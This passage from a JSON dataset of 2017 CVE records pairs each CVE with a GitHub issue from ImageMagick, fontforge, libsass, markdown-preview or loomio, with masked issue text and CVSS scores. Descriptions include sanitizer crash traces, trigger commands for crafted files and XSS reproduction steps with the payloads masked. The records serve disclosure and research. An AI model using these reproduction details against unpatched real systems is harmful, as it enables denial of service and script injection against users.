  6222. "description": "CPU exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick identify $FILE Here is the critical code ERRORTAG length can be controlled as follow: APITAG length is NUMBERTAG bit, so the loop can be very large, and cause a lot of failed I/O testcase: URLTAG Credit: APITAG of Venustech",
  6223. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6224. "severity": "MEDIUM",
  6225. "baseScore": 6.5,
  6226. "impactScore": 3.6,
  6227. "exploitabilityScore": 2.8
  6228. },
  6229. {
  6230. "CVE_ID": "CVE-2017-11527",
  6231. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/523",
  6232. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/523",
  6233. "Repo_new": "imagemagick/imagemagick",
  6234. "Issue_Created_At": "2017-06-24T08:40:41Z",
  6235. "description": "memory exhaustion in APITAG in dpx.c. Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When identify DPX file that contains user header data, imagemagick will allocate memory to store the data in function APITAG in coders\\dpx.c Here is the critical code: ERRORTAG APITAG can be controlled as follow: APITAG There is a security checking in the function APITAG but it is in line NUMBERTAG so IM can not control the memory usage ERRORTAG Here is my FILETAG to limit memory usage APITAG And here is the monitor of real memory usage from IM starting to IM ending NUMBERTAG MB limit can be bypassed: CODETAG testcase: URLTAG Credit: APITAG of Venustech",
  6236. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6237. "severity": "MEDIUM",
  6238. "baseScore": 6.5,
  6239. "impactScore": 3.6,
  6240. "exploitabilityScore": 2.8
  6241. },
  6242. {
  6243. "CVE_ID": "CVE-2017-11528",
  6244. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/522",
  6245. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/522",
  6246. "Repo_new": "imagemagick/imagemagick",
  6247. "Issue_Created_At": "2017-06-24T07:54:37Z",
  6248. "description": "memory leak in APITAG in dib.c. Version: APITAG NUMBERTAG Q NUMBERTAG The APITAG function in dib.c allows attackers to cause a denial of service (memory leak) via a small crafted dib file. ERRORTAG testcase: URLTAG Credit: APITAG of Venustech",
  6249. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6250. "severity": "MEDIUM",
  6251. "baseScore": 6.5,
  6252. "impactScore": 3.6,
  6253. "exploitabilityScore": 2.8
  6254. },
  6255. {
  6256. "CVE_ID": "CVE-2017-11529",
  6257. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/525",
  6258. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/525",
  6259. "Repo_new": "imagemagick/imagemagick",
  6260. "Issue_Created_At": "2017-06-24T14:17:50Z",
  6261. "description": "memory leak in APITAG in mat.c. Version: APITAG NUMBERTAG Q NUMBERTAG The APITAG function in mat.c allows attackers to cause a denial of service (memory leak) via a small crafted mat file. ERRORTAG testcase: URLTAG Credit: APITAG of Venustech",
  6262. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6263. "severity": "MEDIUM",
  6264. "baseScore": 6.5,
  6265. "impactScore": 3.6,
  6266. "exploitabilityScore": 2.8
  6267. },
  6268. {
  6269. "CVE_ID": "CVE-2017-11530",
  6270. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/524",
  6271. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/524",
  6272. "Repo_new": "imagemagick/imagemagick",
  6273. "Issue_Created_At": "2017-06-24T09:13:22Z",
  6274. "description": "memory exhaustion in APITAG in ept.c. Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When identify EPT file , imagemagick will allocate memory to store the data. Here is the critical code: ERRORTAG APITAG and APITAG can be controlled as follow: APITAG There is a security checking in the function APITAG but it is not used in this function, so IM can not control the memory usage Here is my FILETAG to limit memory usage APITAG And here is the monitor of real memory usage from IM starting to IM ending NUMBERTAG MB limit can be bypassed: CODETAG testcase: URLTAG Credit: APITAG of Venustech",
  6275. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6276. "severity": "MEDIUM",
  6277. "baseScore": 6.5,
  6278. "impactScore": 3.6,
  6279. "exploitabilityScore": 2.8
  6280. },
  6281. {
  6282. "CVE_ID": "CVE-2017-11531",
  6283. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/566",
  6284. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/566",
  6285. "Repo_new": "imagemagick/imagemagick",
  6286. "Issue_Created_At": "2017-07-16T18:36:27Z",
  6287. "description": "Memory Leak in APITAG coders/histogram.c. Memory Leak File Link : URLTAG Trigger Command : ./magick convert memory APITAG APITAG Leak Detail : ERRORTAG",
  6288. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6289. "severity": "MEDIUM",
  6290. "baseScore": 6.5,
  6291. "impactScore": 3.6,
  6292. "exploitabilityScore": 2.8
  6293. },
  6294. {
  6295. "CVE_ID": "CVE-2017-11532",
  6296. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/563",
  6297. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/563",
  6298. "Repo_new": "imagemagick/imagemagick",
  6299. "Issue_Created_At": "2017-07-16T15:36:17Z",
  6300. "description": "Memory Leak in APITAG Memory Leak Sample Link : URLTAG Trigger Command : ./magick convert APITAG output.mpc Leak Detail : ERRORTAG",
  6301. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6302. "severity": "MEDIUM",
  6303. "baseScore": 6.5,
  6304. "impactScore": 3.6,
  6305. "exploitabilityScore": 2.8
  6306. },
  6307. {
  6308. "CVE_ID": "CVE-2017-11533",
  6309. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/562",
  6310. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/562",
  6311. "Repo_new": "imagemagick/imagemagick",
  6312. "Issue_Created_At": "2017-07-16T13:53:44Z",
  6313. "description": "heap overflow in APITAG Crash Link : FILETAG Trigger Command : ./magick convert heap buffer overflow READ APITAG output.uil Crash Information : PATHTAG ./magick convert PATHTAG output.uil APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG d NUMBERTAG cbdc at pc NUMBERTAG f NUMBERTAG c NUMBERTAG d bp NUMBERTAG fff1b NUMBERTAG b0 sp NUMBERTAG fff1b NUMBERTAG a0 READ of size NUMBERTAG at NUMBERTAG d NUMBERTAG cbdc thread T NUMBERTAG f NUMBERTAG c NUMBERTAG c in APITAG APITAG NUMBERTAG f NUMBERTAG c6 in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a9a3eb in APITAG APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1 in APITAG APITAG NUMBERTAG d2 in main APITAG NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG d NUMBERTAG cbdc is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG ee NUMBERTAG in malloc ( PATHTAG NUMBERTAG f NUMBERTAG eb NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG eb9d5 in APITAG APITAG NUMBERTAG f NUMBERTAG c2f0 in APITAG APITAG NUMBERTAG f NUMBERTAG c6 in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a9a3eb in APITAG APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1 in APITAG APITAG NUMBERTAG d2 in main APITAG NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow APITAG APITAG Shadow bytes around the buggy address NUMBERTAG c5a7fffb NUMBERTAG c5a7fffb NUMBERTAG c5a7fffb NUMBERTAG c5a7fffb NUMBERTAG c5a7fffb NUMBERTAG c5a7fffb NUMBERTAG fa fa fa fa NUMBERTAG c5a7fffb NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c5a7fffb NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c5a7fffb9a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c5a7fffb9b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c5a7fffb9c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
  6314. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6315. "severity": "MEDIUM",
  6316. "baseScore": 6.5,
  6317. "impactScore": 3.6,
  6318. "exploitabilityScore": 2.8
  6319. },
  6320. {
  6321. "CVE_ID": "CVE-2017-11534",
  6322. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/564",
  6323. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/564",
  6324. "Repo_new": "imagemagick/imagemagick",
  6325. "Issue_Created_At": "2017-07-16T18:31:52Z",
  6326. "description": "Memory Leak in APITAG coders/wmf.c. Memory Leak File Link : URLTAG Trigger Command : ./magick convert memory leak_output_art_lite_font_map output.art Leak Detail : PATHTAG ./magick convert APITAG Leak NUMBERTAG output_art NUMBERTAG output.art ERROR: player.c NUMBERTAG libwmf: wmf with bizarre record size; bailing... ERROR: player.c NUMBERTAG please send it to us at FILETAG maximum record size NUMBERTAG record size NUMBERTAG convert: APITAG ERRORTAG APITAG @ PATHTAG convert: APITAG ERRORTAG APITAG @ PATHTAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG c NUMBERTAG d NUMBERTAG in malloc ( PATHTAG NUMBERTAG f NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG d5 in APITAG APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG b in APITAG APITAG NUMBERTAG f NUMBERTAG bbc NUMBERTAG dd in lite_font_map APITAG NUMBERTAG f NUMBERTAG a NUMBERTAG b NUMBERTAG PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG c NUMBERTAG d NUMBERTAG in malloc ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG b9 ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG c NUMBERTAG d NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG c8 ( PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s).",
  6327. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6328. "severity": "MEDIUM",
  6329. "baseScore": 6.5,
  6330. "impactScore": 3.6,
  6331. "exploitabilityScore": 2.8
  6332. },
  6333. {
  6334. "CVE_ID": "CVE-2017-11535",
  6335. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/561",
  6336. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/561",
  6337. "Repo_new": "imagemagick/imagemagick",
  6338. "Issue_Created_At": "2017-07-16T13:52:32Z",
  6339. "description": "heap overflow in APITAG Crash Link : FILETAG Trigger Command : ./magick convert heap buffer overflow READ APITAG output.ps Crash Information : PATHTAG ./magick convert PATHTAG output.ps APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f NUMBERTAG a NUMBERTAG fedcc at pc NUMBERTAG f NUMBERTAG aec0f9c2 bp NUMBERTAG ffcb NUMBERTAG d5a NUMBERTAG sp NUMBERTAG ffcb NUMBERTAG d5a NUMBERTAG READ of size NUMBERTAG at NUMBERTAG f NUMBERTAG a NUMBERTAG fedcc thread T NUMBERTAG f NUMBERTAG aec0f9c1 in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG aec NUMBERTAG ff8 in APITAG APITAG NUMBERTAG f NUMBERTAG ae NUMBERTAG c6 in APITAG APITAG NUMBERTAG f NUMBERTAG ae NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG adf9c3eb in APITAG APITAG NUMBERTAG f NUMBERTAG ae NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1 in APITAG APITAG NUMBERTAG d2 in main APITAG NUMBERTAG f NUMBERTAG ad NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG fedcc is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG af3e NUMBERTAG in __interceptor_posix_memalign ( PATHTAG NUMBERTAG f NUMBERTAG ae8ed8de in APITAG APITAG NUMBERTAG f NUMBERTAG ae6e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG ae6dd0d1 in APITAG APITAG NUMBERTAG f NUMBERTAG ae6ec1f0 in APITAG APITAG NUMBERTAG f NUMBERTAG ae8b NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG aec NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG ae NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG ae NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG adf NUMBERTAG ad in APITAG APITAG NUMBERTAG f NUMBERTAG ae NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1 in APITAG APITAG NUMBERTAG d2 in main APITAG NUMBERTAG f NUMBERTAG ad NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow APITAG APITAG APITAG Shadow bytes around the buggy address NUMBERTAG fe NUMBERTAG d NUMBERTAG fe NUMBERTAG d NUMBERTAG fe NUMBERTAG d NUMBERTAG fe NUMBERTAG d NUMBERTAG fe NUMBERTAG da NUMBERTAG fe NUMBERTAG db NUMBERTAG fa[fa]fa fa fa fa fa fa NUMBERTAG fe NUMBERTAG dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fe NUMBERTAG dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fe NUMBERTAG de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fe NUMBERTAG df0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fe NUMBERTAG e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
  6340. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6341. "severity": "MEDIUM",
  6342. "baseScore": 6.5,
  6343. "impactScore": 3.6,
  6344. "exploitabilityScore": 2.8
  6345. },
  6346. {
  6347. "CVE_ID": "CVE-2017-11536",
  6348. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/567",
  6349. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/567",
  6350. "Repo_new": "imagemagick/imagemagick",
  6351. "Issue_Created_At": "2017-07-16T18:37:29Z",
  6352. "description": "Memory Leak in APITAG coders/jp2.c. Memory Leak File Link : URLTAG Trigger Command : ./magick convert memory APITAG output.jp2 Leak Detail : ERRORTAG",
  6353. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  6354. "severity": "MEDIUM",
  6355. "baseScore": 6.5,
  6356. "impactScore": 3.6,
  6357. "exploitabilityScore": 2.8
  6358. },
  6359. {
  6360. "CVE_ID": "CVE-2017-11537",
  6361. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/560",
  6362. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/560",
  6363. "Repo_new": "imagemagick/imagemagick",
  6364. "Issue_Created_At": "2017-07-16T13:49:58Z",
  6365. "description": "Crash in APITAG write palm format image. Crash Link : FILETAG Trigger Command : ./magick convert FPE APITAG APITAG Crash Detail : PATHTAG ./magick convert PATHTAG APITAG Aborted (core dumped)",
  6366. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6367. "severity": "MEDIUM",
  6368. "baseScore": 6.5,
  6369. "impactScore": 3.6,
  6370. "exploitabilityScore": 2.8
  6371. },
  6372. {
  6373. "CVE_ID": "CVE-2017-11538",
  6374. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/569",
  6375. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/569",
  6376. "Repo_new": "imagemagick/imagemagick",
  6377. "Issue_Created_At": "2017-07-16T18:42:01Z",
  6378. "description": "Memory Leak in APITAG coders/png.c. Memory Leak File Link : URLTAG Trigger Command : ./magick convert memory APITAG FILETAG Leak Detail : ERRORTAG",
  6379. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6380. "severity": "MEDIUM",
  6381. "baseScore": 6.5,
  6382. "impactScore": 3.6,
  6383. "exploitabilityScore": 2.8
  6384. },
  6385. {
  6386. "CVE_ID": "CVE-2017-11539",
  6387. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/582",
  6388. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/582",
  6389. "Repo_new": "imagemagick/imagemagick",
  6390. "Issue_Created_At": "2017-07-18T04:52:17Z",
  6391. "description": "Memory Leak in APITAG coders/png.c. Crash Link : URLTAG Trigger Command : ./magick convert memory APITAG output.art Crash Detail : ERRORTAG",
  6392. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6393. "severity": "MEDIUM",
  6394. "baseScore": 6.5,
  6395. "impactScore": 3.6,
  6396. "exploitabilityScore": 2.8
  6397. },
  6398. {
  6399. "CVE_ID": "CVE-2017-11540",
  6400. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/581",
  6401. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/581",
  6402. "Repo_new": "imagemagick/imagemagick",
  6403. "Issue_Created_At": "2017-07-18T04:41:54Z",
  6404. "description": "Heap Overflow in APITAG APITAG accessor.h. Crash Link : URLTAG Trigger Command : ./magick convert heap APITAG APITAG Crash Detail : ERRORTAG",
  6405. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6406. "severity": "MEDIUM",
  6407. "baseScore": 6.5,
  6408. "impactScore": 3.6,
  6409. "exploitabilityScore": 2.8
  6410. },
  6411. {
  6412. "CVE_ID": "CVE-2017-11554",
  6413. "Issue_Url_old": "https://github.com/sass/libsass/issues/2445",
  6414. "Issue_Url_new": "https://github.com/sass/libsass/issues/2445",
  6415. "Repo_new": "sass/libsass",
  6416. "Issue_Created_At": "2017-07-18T13:21:02Z",
  6417. "description": "There is a stack overflow in sassc of the libsass library. This was reported here: CVETAG In this Bugzilla ticket you will find all the information and the code to reproduce the error.",
  6418. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  6419. "severity": "HIGH",
  6420. "baseScore": 7.5,
  6421. "impactScore": 3.6,
  6422. "exploitabilityScore": 3.9
  6423. },
  6424. {
  6425. "CVE_ID": "CVE-2017-11568",
  6426. "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/3089",
  6427. "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/3089",
  6428. "Repo_new": "fontforge/fontforge",
  6429. "Issue_Created_At": "2017-06-14T13:41:09Z",
  6430. "description": "heap buffer overflow in APITAG (psread.c). ERRORTAG Testcase: FILETAG",
  6431. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  6432. "severity": "HIGH",
  6433. "baseScore": 7.8,
  6434. "impactScore": 5.9,
  6435. "exploitabilityScore": 1.8
  6436. },
  6437. {
  6438. "CVE_ID": "CVE-2017-11569",
  6439. "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/3093",
  6440. "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/3093",
  6441. "Repo_new": "fontforge/fontforge",
  6442. "Issue_Created_At": "2017-06-14T13:48:35Z",
  6443. "description": "heap buffer overflow in readttfcopyrights (parsettf.c). ERRORTAG Testcase: FILETAG",
  6444. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  6445. "severity": "HIGH",
  6446. "baseScore": 7.8,
  6447. "impactScore": 5.9,
  6448. "exploitabilityScore": 1.8
  6449. },
  6450. {
  6451. "CVE_ID": "CVE-2017-11570",
  6452. "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/3097",
  6453. "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/3097",
  6454. "Repo_new": "fontforge/fontforge",
  6455. "Issue_Created_At": "2017-06-14T13:54:25Z",
  6456. "description": "global buffer overflow in umodenc (parsettf.c). ERRORTAG Testcase: FILETAG",
  6457. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  6458. "severity": "HIGH",
  6459. "baseScore": 7.8,
  6460. "impactScore": 5.9,
  6461. "exploitabilityScore": 1.8
  6462. },
  6463. {
  6464. "CVE_ID": "CVE-2017-11571",
  6465. "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/3087",
  6466. "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/3087",
  6467. "Repo_new": "fontforge/fontforge",
  6468. "Issue_Created_At": "2017-06-14T13:35:58Z",
  6469. "description": "stack buffer overflow in addnibble (parsettf.c). ERRORTAG Testcase: FILETAG",
  6470. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  6471. "severity": "HIGH",
  6472. "baseScore": 7.8,
  6473. "impactScore": 5.9,
  6474. "exploitabilityScore": 1.8
  6475. },
  6476. {
  6477. "CVE_ID": "CVE-2017-11572",
  6478. "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/3092",
  6479. "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/3092",
  6480. "Repo_new": "fontforge/fontforge",
  6481. "Issue_Created_At": "2017-06-14T13:47:01Z",
  6482. "description": "heap buffer overflow in readcfftopdicts (parsettf.c). ERRORTAG Testcase: FILETAG",
  6483. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  6484. "severity": "HIGH",
  6485. "baseScore": 7.8,
  6486. "impactScore": 5.9,
  6487. "exploitabilityScore": 1.8
  6488. },
  6489. {
  6490. "CVE_ID": "CVE-2017-11573",
  6491. "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/3098",
  6492. "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/3098",
  6493. "Repo_new": "fontforge/fontforge",
  6494. "Issue_Created_At": "2017-06-14T13:55:38Z",
  6495. "description": "global buffer overflow in APITAG (parsettf.c). ERRORTAG Testcase: FILETAG",
  6496. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  6497. "severity": "HIGH",
  6498. "baseScore": 7.8,
  6499. "impactScore": 5.9,
  6500. "exploitabilityScore": 1.8
  6501. },
  6502. {
  6503. "CVE_ID": "CVE-2017-11574",
  6504. "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/3090",
  6505. "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/3090",
  6506. "Repo_new": "fontforge/fontforge",
  6507. "Issue_Created_At": "2017-06-14T13:43:23Z",
  6508. "description": "heap buffer overflow in readcffset (parsettf.c). ERRORTAG Testcase: FILETAG",
  6509. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  6510. "severity": "HIGH",
  6511. "baseScore": 7.8,
  6512. "impactScore": 5.9,
  6513. "exploitabilityScore": 1.8
  6514. },
  6515. {
  6516. "CVE_ID": "CVE-2017-11575",
  6517. "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/3096",
  6518. "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/3096",
  6519. "Repo_new": "fontforge/fontforge",
  6520. "Issue_Created_At": "2017-06-14T13:52:52Z",
  6521. "description": "global buffer overflow in strnmatch (char.c). ERRORTAG Testcase: FILETAG",
  6522. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  6523. "severity": "HIGH",
  6524. "baseScore": 7.8,
  6525. "impactScore": 5.9,
  6526. "exploitabilityScore": 1.8
  6527. },
  6528. {
  6529. "CVE_ID": "CVE-2017-11576",
  6530. "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/3091",
  6531. "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/3091",
  6532. "Repo_new": "fontforge/fontforge",
  6533. "Issue_Created_At": "2017-06-14T13:45:05Z",
  6534. "description": "negative size param in readcfftopdict (parsettf.c). ERRORTAG Testcase: FILETAG",
  6535. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6536. "severity": "MEDIUM",
  6537. "baseScore": 5.5,
  6538. "impactScore": 3.6,
  6539. "exploitabilityScore": 1.8
  6540. },
  6541. {
  6542. "CVE_ID": "CVE-2017-11577",
  6543. "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/3088",
  6544. "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/3088",
  6545. "Repo_new": "fontforge/fontforge",
  6546. "Issue_Created_At": "2017-06-14T13:38:49Z",
  6547. "description": "global buffer overflow in getsid (parsettf.c). ERRORTAG Testcase: FILETAG",
  6548. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  6549. "severity": "HIGH",
  6550. "baseScore": 7.8,
  6551. "impactScore": 5.9,
  6552. "exploitabilityScore": 1.8
  6553. },
  6554. {
  6555. "CVE_ID": "CVE-2017-11593",
  6556. "Issue_Url_old": "https://github.com/volca/markdown-preview/issues/60",
  6557. "Issue_Url_new": "https://github.com/volca/markdown-preview/issues/60",
  6558. "Repo_new": "volca/markdown-preview",
  6559. "Issue_Created_At": "2017-03-04T23:23:26Z",
  6560. "description": "Sanitize content to avoid XSS. Markdown Preview makes APITAG vulnerable to XSS attacks on files that are not designed to be interpreted by web applications. How to reproduce NUMBERTAG An malicious user creates a txt file (or another format supported by Markdown Preview) with the following content: APITAG NUMBERTAG He uploads it on a remove server using a web application NUMBERTAG If the web application allows the opening of txt files in the browser, Markdown Preview is a vector for XSS attacks, because the JS payload will be executed This behavior makes all users of Markdown Preview vulnerable to XSS attacks in a lot of web sites, because these websites are not designed to escape or force the download of txt files. How to fix Markdown Preview should sanitize the content in order to avoid XSS.",
  6561. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  6562. "severity": "MEDIUM",
  6563. "baseScore": 6.1,
  6564. "impactScore": 2.7,
  6565. "exploitabilityScore": 2.8
  6566. },
  6567. {
  6568. "CVE_ID": "CVE-2017-11594",
  6569. "Issue_Url_old": "https://github.com/loomio/loomio/issues/4220",
  6570. "Issue_Url_new": "https://github.com/loomio/loomio/issues/4220",
  6571. "Repo_new": "loomio/loomio",
  6572. "Issue_Created_At": "2017-07-21T19:36:04Z",
  6573. "description": "FILETAG > Hello, > > I just found an XSS vulnerability in Loomio. > > How to reproduce > > A malicious user creates an new thread > In the description, (s)he enters: APITAG > The targeted user visits the thread and clicks on the malicious link > The JS payload is executed > > How to fix > > \"href\" content should be sanitized > > > I found this vulnerability because I'm currently and voluntarily > searching for XSS vulnerabilities in the services that we offer or use > at the French non profit association Framasoft. > > I remain available for any additional comments or questions. > > Best, > Martin Thanks to the Loomio developers for the fix.",
  6574. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  6575. "severity": "MEDIUM",
  6576. "baseScore": 5.4,
  6577. "impactScore": 2.7,
  6578. "exploitabilityScore": 2.3
  6579. },
  6580. {
  6581. "CVE_ID": "CVE-2017-11610",
  6582. "Issue_Url_old": "https://github.com/Supervisor/supervisor/issues/964",
